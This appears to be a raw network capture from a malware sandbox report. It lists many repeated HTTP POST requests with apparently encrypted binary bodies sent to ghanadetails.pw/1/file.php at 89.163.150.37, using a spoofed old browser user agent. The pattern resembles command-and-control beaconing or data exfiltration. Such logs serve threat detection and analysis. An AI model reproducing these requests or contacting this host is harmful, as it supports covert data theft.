\x9ciY\x15L\x9d\xdfs!\xdd\xe0+\xfe\x84\xa6\xcd\x8c\x89XLNG\x99N\xea\xfd5\x8fMI@\xec@W\x1cg7\x9a\x7f\x98X`\xb6R\xdf\xb8\x1e\xf7,\xc4\x12\xeb9%z\x94\x07\x8f\x07\xc2\xfb,\xf3\x01cM\xbcT\xc1\xd6\xc4\xbe\xa8X\x10\xf2\x7fyo\x07Yr\xa0x\xea\xfdpX\xd1\xda\x8bOoeh\xcbOI\x0e\x11\x15\xd9&j\x00C\xb4\xb0%\x17\xf7\x91\xa0!\xeb.k\x18b%\x02\x82\xbe]v]\xc4\x83\x12/)a\x8f
\x8c\xb9X\xff\xf1\xb0RQ

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 142
Connection: Keep-Alive
Cache-Control: no-cache

\xba4\x87Q\xff\xa8b\xcadI\x05\x01\x9b\x17\xb4\xf2\xdd\x9c=M\xb4\xe6-\x0c$\xb9\x1b\x80\x12\x15\x9d\xe5o\x03\xcb*\x8d\xa6\xcb(\x14\xfdZq\xb3"\x05\xc1t\xd8~\xe3\xca\x8d\xc7\xdf\xc0\xc2 \xc4\xady'\x01E\x10b\x10r\xe3y\x07\xed\xcc\xf5\xd8\x1a\xea}8\x08g\xc5y\x10\\xc4\x1a\x1f\x9e\xa5@09\xb5\xc2`\x1d\xd9\\xaf\xe5\x92\xdaL\xdeX\x93I\x8d\xec\xa7\xf8=\x87&\x98\xb0\xdfn\xc5\xcf\x99[ \x08\x10\x834r\xf7%<81\x00\x1dk\x14\x9a7\xc2

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 142
Connection: Keep-Alive
Cache-Control: no-cache

\xea\xfe\xf7]D\xe6Ab\xd8\x10\xf8\xd1\xb1]c\xda\x8b\xd9\xf9`8\xbfE\xcc\x96kX\xe6~jB"\xf8\x0e|\xe1\xf1//Goc`f^\xaf\x15.\xe5Z}	\x81\x13h\xd8\xb5\xd7\xa4e\x06\xc1?\x01\x15\xda\x12\x1c\xc9\xadZ\xafQ\x95\x08\x080\xa0\xaa\x10^"\x01T\x9c\x05\xac\xda\xadL\xe6&\Fj\x05\xf7\x10n\x97\xd3lv\xb57@b\x84\xa4\x00\xfcHi\xbf\x84\xcc\xd3.pi\xb0\xda\x1d\xfa\x8b\xb0\x08\x83d\xb8\x87)\x87v\x12\xa8\xa12\xe9J\x1d\x88

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 145
Connection: Keep-Alive
Cache-Control: no-cache

7\xabgq\x17\xdc\xcc\x1a_\x92\xe4\x02\xbfH?\xcf\xb2Gh@+\xaf+C\xc3*\xaa3\xf2T\x9f\x90\x88\xf6A`\x0f\xb8\x0f\x92EL\xd1\x18\xc9O\xf0\x02<\xb1\xc8\xe0~F1\xea\x96\x94\x1f\xb2\x88\xfd\xe0\xb1x?2\x80*'ggf\xa7\xa4k\x8e\x05F\xb5\xd7\x0c \xc4?\xa5r\xe5H\xbd\xa4C`\xc8\x07\x07(G\xfc\xb9\x82T\xf9\xcf\xb2\xc0|U\xa8\x17\xa2_R#\x17\xee\xc5;\x1b\xe3\xe7\x99\xed-\x05\x8c\xd73	]\xb7\xaa|\xee=7\xc5YV"\xab$Z\xe0\xa0

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 145
Connection: Keep-Alive
Cache-Control: no-cache

/\xa9dX;I\xa1dk="\xe6\xeb\x11W]q\x884\xce\xe2\x1f\xba\x0f\xe7\x92M\x1c\xb5\x84\xee\xf7\xf7\x93%.DJ\x05\x8b\x16\x84p\x9b\xfaq\xff\xf7\x98\x19\xf3	\xd0\x91\xc7\xc1\xd5K\x9f\xfa\xa8J\xf6\xb1`=1\xa9\x06\xb2
\x19R\x08b\x8f\xda\.'\x14\xc3|J\xf6\x15\xe3\xa9l\x05Cl'\x18v`W"\x98\xf7\xc9\xa6\xf3\xd6\xe1\x08\xdd\xd6\x9b)\xad\xaa\xf6\x8b,\x07k\xec\xed\xc8\xa4Fme%;\xc13\x11_\xb4\x83P{PI\xf1\xf6\x90\xc6\xff}2rc

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 145
Connection: Keep-Alive
Cache-Control: no-cache

\xff\xed\xa1\x90\x9d\xddl+\xe6&\xa9QJ\xd7\xc4p\xa1_\x03\x8fE/u\xb6\xc1\xfd\xab\xf5\x1a\x03a\xa7w\x87\xb0\xb6\xb2\x8e\x98\x94\xcb\xcf\xab|\x0b\xe7<\x8a\x18\x9e\x94\x18'\xf1X(\xa3t)CW\x9d)\xb1\xb0y\xf4a\xa0&\xc7V\xdf\x13\xe98{\x9a\xbd
\xc4\x14K\x0bQ%,\x10Jj\xa5\x85\x88\x9f\xf90\xd76
o?bn\xc9<C\x061j\xbfn\xd7v\x0cK\x16\x9c\x8cr!\xd2y\xdb\xdc\xda\xec\x1e3\xc1\x1bqK\xf6\xef\x9d\x06|\xed\x1bq^\xbb\xa1_\xb3

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 141
Connection: Keep-Alive
Cache-Control: no-cache

P\xf8\xbbr&5	C\xc3\x0e\xd2\xb8\xe1\x89\xdb\xf0p\x8b?\xb2L\x93\xc4W\xdeE\x08\xafN\xa8\xa1\x0bh"\x1a\xe4\xb9\xd6ML^W`%\xdd'\xc3PT\xcb\xcc\xc7_/\xa8\\xc1\xa3\xae\x8e\x94\xa1~\x8a$W\xd5\xb8 \xf5\x99\x05\xc1\x00\xa9\xea\xeb\xff\x99\xb1.\xfbL
c\xa2\xa6\xcan\xe9=\xe4\xe7\x0f\x02\xa7\xef\xb4\x80\x1a\x13\x1d\x9c6\x8e\xfc\xeaOVv\xe6\xc00O\xe0\xbc\x06\xa3PSZV\xef\x11\x19\xd0I\x08U5^\x8ce#\x9d
<\xa1_\xa6\xc1

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 141
Connection: Keep-Alive
Cache-Control: no-cache

\xb8\xe7n\x82E))\xbfOr\xfaT\xb3c\x911\xcf\xf8\x1e\xbd\xc8#:\x7fy\xf2&\xcc\xba\xb4\xcc\x7f\xf4I\xbb`\xae\xbe\x19\xc4\xa6_<\xbd\xfb\xb9\xfd\xe5\x9f\xcc\x99\xbc\xaf\xeb"\x00\x12`\xf4\x99\x14\xc9g\x8a\xccH\x00HC\xe9\xb9\xf9M|\x81\x06\xb9\x15\xd3p\x91\x88m\x02\xe7\x12X\xe2\xc9^\x13\x87\x13\x13o\xd3s\xdf!\x9e\x04u\xc8\xbev\xf4\xb6\xd7p\xe8\xd8u\xfbH\xb5\xc7\xf6g\xda\x0f\x89\x95\xb5\x06\x99\xb8P\x08\xbd*\x8b|\x06?\xbd\xf1\xb0\xddwJ\x93

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 141
Connection: Keep-Alive
Cache-Control: no-cache

\xb02\x8d\xeeC\xe8\xb6k\xf0\xb9\x91V\xbd\xbd(\xe7tx\xcd\xd3\xf9;\xa9\xfe\xe3\x16a#\xeb}\x04\xb56V\x92\xc6b\xb5L\xda\xd3^\x9du?\xad\x8e\xf9\xee\x86\x80\x18T9{KBNy\xbc\x8f\xcae\x8a\xc4\x9d\xe3$E(&-\xf2\xb7\xea\x04\xb7\xcbj\xa6*\x08\xbel\xd6
\xcbcS\xbaThB\xda\xa7\x19\xb1\xc0\x088\xc8~\x9d\xa0\x03\xf5\x17\x1f\xb4\xfc\xabi\x8a\x02\xacc
\xb5\x83D\xd9\xbb8#\x02\xbbR\x08\xb5\xffh\x10\x00\xfe"%\x0f\x16\x1cH\x9d

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 130
Connection: Keep-Alive
Cache-Control: no-cache

\x13\xed\xdbV\xab\xcc\x88*\xa9\xb9\xf3\x8f\x9bf\x86\xc1?\x7f\xcb\xc2\x08\xfa\x91\xc517\x80\xec\xb3\xfd\x05~QM\x00\xbaNU\xb6_N\x9a;hL*\x9d\x0e?4\xbf e\xe0[r\xecF\xeb\xbd\x19\x84\xaa\x8fbG\xb0\x99\xa8	\x1di\xae\xb2\x8d\xd8\x94\x15\xc1\x85d
\xbdx"\xce\xf6]\x84\x9e\xb0\xa2\x1f_\xa3\xd7\xdc\xd1\x90N\xee\x94m/\x94;\xbb\x08\\xe9\xcb\x81\x0f\xcbd\xbc%\xadb\xa6\xc5T\x17"\x80\xe6\xcdJJO

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 130
Connection: Keep-Alive
Cache-Control: no-cache

E\xdc\x8f@\x00\xb9\x8en=eA\xd3\xb0P\xca\xfaA\xf4Nbe+57\x03k\x1caf\x86S(Q*\x02\xfa\xb3v\xe6M\x8c\x10\xdfb1J\x87c\x17\xe9l\xd6^g\xa9\xd6\x88L!f\x9a\xa9\xaa\x8f4v\xe4\x8f\x03|\x1b-:n?\x84\xbf#\x8d\xbe\x1a\x818\xd8O\x1fR\xaf\xb6\xc2,/\xca$\xf5\x81\xdc\xb6\x92\x0e\x13\xb7==V\xb1_\x02!\x89\xd1\xec'\x16\xb7J\x1e*\x90\x02\xa1^\xdd\xf9\x03\xcb\xcdJ\x1c~

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 130
Connection: Keep-Alive
Cache-Control: no-cache

b\xa6Z\x0b\x87Y\x8b\xe0\xee0\xdc\/VS\x91\xa6g\xc6E\xbc\x05\xc5s\x93\xaa\xb8\xb7\xec$\x93\x12Lj\xed\x8b\x0e\xac\xd9\xf9e\x7fx\xd7\x94v$2\xca@\xde\xcb\xbdsc\xa8"\xb7\xbf\x8a*1P\x8f\x13\x0c1\xc4\x84\x9c\x1e\xa3\xe9;\xa2\x0b %\x14\xd5\xfd\x12\xb0\xff\x961\xa2\xeb&\x03\x88\xf9@\x865\xbb\xc1\xf6}\x7f\xaem\x02\x89\xbf\xde\xf8\xb7\x84\xb5r\xbd\xfa\xbf\x05W\xfd>Z|\x0b\xa5C\x15\xb3S7J;\x04

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 142
Connection: Keep-Alive
Cache-Control: no-cache

p\x0f=\xf1\xa3\xcb\xac\x85\xfdi\x86\xbe@\xc0\x04r\xa3k\x9dj\xc39q\x08NU\xaf\x19\xc5\xc0
\x88\xc8U\x1c\xe7\xbc\xa8h
\xe0\xb0\xb4\xa3\x05\x98\xd8,gB\xb3\xa9\xd0?\xf6\xb6\xc7C\xf90\x17\xc1\xdd\x01\x8f+\xd8\xb0.\x80\xb7Ht\xecvg\xc1=\xcd\xb8v\x90e^g\x83\x98\x1eur\x11\xd9\xe7\xec"\xaf\xc7K\x0e\x91\x9e\xeb1\xf8\xb8\x93\xb6A\xff71J\xeb\xa7Jl\x82\x02\xee\x07\xc2N@\xaf\x9a\xb0\xea\x83\xfeIM\x85`[\xffO\x84K\x97%\xec\x15

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 142
Connection: Keep-Alive
Cache-Control: no-cache

\xe7\x8e6\xa2e~\xdc7\xe2\x92\x91\x18\xc48i\x90\xe1 up\xcd\x1d\xa9n\x05\x96\xe8\x11\xda*g\x8dZ\xd1\x12\xb1\x7f\x18\x1d\xbd\xfaN\xa6\x00\x84e\xb0\xcb \x0c^\xb6\xdb\x1e+\xd5\x89\x85\xbb=
.\xb5\x01\x18\xaa\xd3\xe3\xe85\xc7\xfak\x17a\xc1E\xc5\xa0Z4\xdb\x8dDi\xa7@x>\xb1V\xd1\xf8\x06O\xaaU\xcf\x00\xc7][DO\xa2m\xa4\xe2~\xcaY\xad\xac\xe9\xa7s\x89#3d\x8c\x88\x02\xa2\x80_\x82\x83i\xc8F\xd6\xa6\xee\x8f\xfd\x9b\xb0\x80\x83h\xed

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 142
Connection: Keep-Alive
Cache-Control: no-cache

DfGb;l\xf2\x15\x1d\xd8\x87+:\xb7\xcaK\xabm\x85l)\xd3\xfa\xc0\xf8\xf19\x84\x99\xab\xaep\x04\xc4\x9e\x8c\xdc\xf7\xceb\xf8\xf9M\xce\x87\x17\xee\xed\x97\xbcSW\xc2-\x85\x86\x89\x1f\x97U\xb3R\x81\x01\xbbB\xa2#\xb6'\xe9\xd8\x94]w\xf2\xbbJ\x03\x81~\x96}X\x8di\x13\xd6\xc3\xd6\x87D\xbb\x87\x86W\x0b\xda\x8c\xfa\xfe\xb4\x97\x90\xa0\xdaO,}\xb8\x07\x8b\x1bY\xaa\x92\x90\x10\x9d7\x8c\x12.\xca>#\xb6\x83\xca 7\x16\xf8\xfc\xa1\xdfd\xfa\x96\xb0\x96b

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 145
Connection: Keep-Alive
Cache-Control: no-cache

\xfd\x0c\xee(\x91\xd8,T\\xff\xe9\xfc\xdc\xe0\xb0\xe2\xd9\x0e\xf5z\x1a\xcdp\xef\xa4^\x04_g\x19.w\xa5\xb6/\xden[\x08;\xa1\xc6;\x01M\x00\x98\xc8\xb0\x1f\xb2=\xa8\xc3\x8d\xa1\x16\x07V9\xfaW\xb6\xb1\xb2\x98\xbb\xd9\xac#\x87)e\xca\xa9\x95\xed\xad\xc9\x98\xbcE\xbd\xfe\x0e\xc7)I/\xc9
/\xf5\x85\xb6\xe0\x05\x07\x92\x07\xe3\xb7\xfefVJ\x96L,X\xca\x95\xde\x8dm3\x13\xbe\xa7\xa8g
\xa4\xa6w&\x813\xc3\xfa>\xf3\xfa\xea\xddy\xc64[\xdc\xc8\x8c\xd5\xcd\xcb

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 145
Connection: Keep-Alive
Cache-Control: no-cache

\xd9\xfd\xc2\x03\xc9	\xbbH\x8a\x93\x93\xd7\x0c\x8a@\xae\xaf R\xf0*\xe7	y\xb4\xcf\x8c\xdf;\x14\xd65\xc3\x05A\xb7t\xc8\xdde5\xe8\x03h\xdf(*\xc6\x84sW\xf5\xda\xab\xb6uD\xd4\x9c\xfb\xe4\x18\x0c\xb1\x96i\x97\xf2\xf4\xf2\x105\xb3\xa6\xd3\xbe=\xc79\xd4\xcak\x1at>\xedP\xdf?X\x82\xaf\xa9\x88N\xa2c\xb4\xfcn\xf9$+8\xc2d\xae%\xbepx\x9b\xea\xe1\x88\xfba\xd6\x9c|5\xd9ndii;3\xe7\x0b\x12\xd8\xa2;Je\x10X!\xf7\x18\xe6%\x81\xbd

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 145
Connection: Keep-Alive
Cache-Control: no-cache

\xba\x1e\x95\xd7:\m?\xd3\x90\x8a\x14\xe3\x0b\x0c(\x1c\xfb0\xb4\x10G\x7f\xe7T\xbf\xe1\xad\x92\xdd\x87\xaf:|\x8c\xf9\x1d\x07\x91\x88\xf6q\x801\xaa3\xfc\xda\xad2\xaf+z\x91Zq>>k\x13\xd7K\xc7\xb1\xf5\x8a\xc0&\x07\xa7\xc6B\xea\xa5\xca}\xd2FuRy\xb0x0\x04M&A\xdf(\xef\xdd\x00A\x1f8\x9a\xcd1 \x90\xebg\xd5\x01\xfd-|\xcbk\xae\x87\xc3\xa0p%\xc1\xecpxO3\x99\x8cZ:\xf03\x84\xe8E\x0cQn\x9c\x12I[84\xf7gi\x07\x0e

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 141
Connection: Keep-Alive
Cache-Control: no-cache

^1k\x1ek\x9d(\xe0)\xa1k\xa1\x97\x11D?|\xaau\xcb\xd0\x8e\xe8Oi\x10\xbcT\xb8\x08\xf5\x0ec\xee\xcf\x8d\xf1{i\xea\xb1\xfd\xdc9\xae\xbaY\x9a]\xef\x83\xbb\xc67\x81As\xf3\x1fpg\x04/\x8a*\x9e\x05\xd4m]\xb8\xa6+\xaf\x10\xf3\x9dg\x06~"\xda\x06t\xff\xbf\x8a\xd2\xd9\xbc\x89\x1f\x11\xafV\xa2\xe4xUs[\xb0\xb8\x90aVVS%\xeb|
9k\xaf\xc0\x9f\xbbyN\xe8\x06^\xef\xeau\x18\x08[\xfc\x8e\xe0(\x8b\xbc\xae\xd6\x0e\xe6\xbf\xb7

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 141
Connection: Keep-Alive
Cache-Control: no-cache

\xae\xff0de2\x07\xaa\xab\x85\x10\xafm\xc3\x11\xa2\xb6xh\x9b\xfa\x9f\xe9\x17H\xb5\xe0\x12:\x91\x82\x1a\x874\x80\xe3\xeb\xc0R\xb4'\xcd\xb3#@|\x18\x13\x83)\x8a\xff\xf82\x94
FBW"\xf1\x89L\x8a\xdaP^\xaec\xf2\x97\xec\xa9\x8bk\xfdg\xb5S\xe3\xe8\x08\x1b$\xd5\xae\x8b\x8a\xf8\x19\xd5Y\x936!\xb6\x00\xa2\x1a\x1dA\x0b\x83\xce\xf7f9I\xcb-=\x83\xe7\xad\xa6\x84\xa1\xbel\x02\xdd\xb7\x16\xbd|\xf8{\x08\xab2\xd5\x9a&$\x93\xe4T*\x9d\xb1M

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 141
Connection: Keep-Alive
Cache-Control: no-cache

c\xfe\xbd4\x8c\xb7\xe3\x05\x87\xf3\xcf#u\x90\xf0\xbe/\xfe\x06
p\xc2\xefp\xdb`'\xdb\x8a:\xd8\xf5\xa5\xda\xe2\\xed\xaaY\xf4\xe4T\x83@\xb7\xc0\x16\xe0\xf5@\x0b\x81\x9d\x80}\x85:x\x7f\x04\xae\xcd\xf9\x8a\x17Q\xd3\xfe\x8awsC\x85\xfd\xb4q\x7f\xe6\xb2\xffq\x8eu\xb5_\xf3\x8d\xedk\xcc\x12\x90#\x9d{Y"Lx\xa2Ga\x88\x8e4\xff	*<\x913p\x91\xc4'\xfa\xc4\x0c\x85\x8a\xa1\x8d>\x9b#\xbc\xce\x08f3X\xca\xcf\xa1wKx\B=U

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 130
Connection: Keep-Alive
Cache-Control: no-cache

\xbb#\xf9\xf3\x8ep\xac,*c\x00\xdf\xe2\xd1\xd5\xbf\x94S9\xdb\xb2\xb3\xcf+GxE\x984
\xb0\x1a\x9d\xe7F{\x0f\x8d\xf6=\xa9$\xac\Q\xf9\xaa\x14\xf0|)]\xbb\xcda\xf8\xfemJ\xad\xfa\x17{\x8f\xca\x89\x92<\x8d\xb59o-h~\x88\xed\xa2\x92\xfb\xcf&Oa\x98\x87\xa8\xb3\xf2\xd1u\xd6\x98\xa8\x16\xb3\x10{\xd6\x8f\xafL-Ms\x85,<A:\xfc\x9b\xc0\x83\xf2\xc1\xfb\x80X,\xd7\x7f\xb62cu\x1cJ\xe2\x81

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 130
Connection: Keep-Alive
Cache-Control: no-cache

\x88I
xj|O\xcf\xf5\x05'\xfae\xb0{\xf9\xa6?\xee\x15\xe7\xb3\x89\xa5\x16\x95\xb2>>\x91\xb0\x0c\xb8\x9b\xa3\xe6\xfd\x97\x03\xc8`T\x9do\xc0\x8e\x12D\xd4\x06\xe8\x85\xf8\xdb1`\xb9\x96\xab\x1d\xe6\x9am\x8f\xf9\xe3a\xb7i\xb9\xda\x8c\xf2\x0eY\xadj\xc3<\xbd\xfdJ\x98\xaf\xcd\x87\xee=\xa3<\x82p\x923\x16\xa55\x073\x12]V\xd8\xb8\xba\xf5\x1d\x0f\xd0MD\xcb\xe4\xf93\x19\xb8\x96\x08\xb4\x90\x84W\x82\x7f\xf8
J\xd1\xeb

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 130
Connection: Keep-Alive
Cache-Control: no-cache

	\xd0\x7f\x13\x94'\x18J	\xa3De\x8a\x97\xcd\\xdb\x07\x07\x12\x92][25:\x8a\x90\x1a4\xcd\xa5\x90\xab\x7f$\xaae\xfd\xe45[WY\x86\x00
H\x00\x97\xa8+$\x9cJ^3\x90:\x1ak\x96\xb9\x8fxz\x14\xdc\x97\xe2\x8d	\x0e\xa8:2\x85\xe4\x8a\x18\x80rq\xa8\xb8i<\xaa\x80\x93\xba\xde\xb6\x96k\x0c\x1d7\xef\xd0
\xa4&\x94\xef\xfa\xd79\x96\xc3[\xc70hs\xb7d\xd1s\x8a\x1a\x82\xc6\x85\xf2\xf4\xdeJPr

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
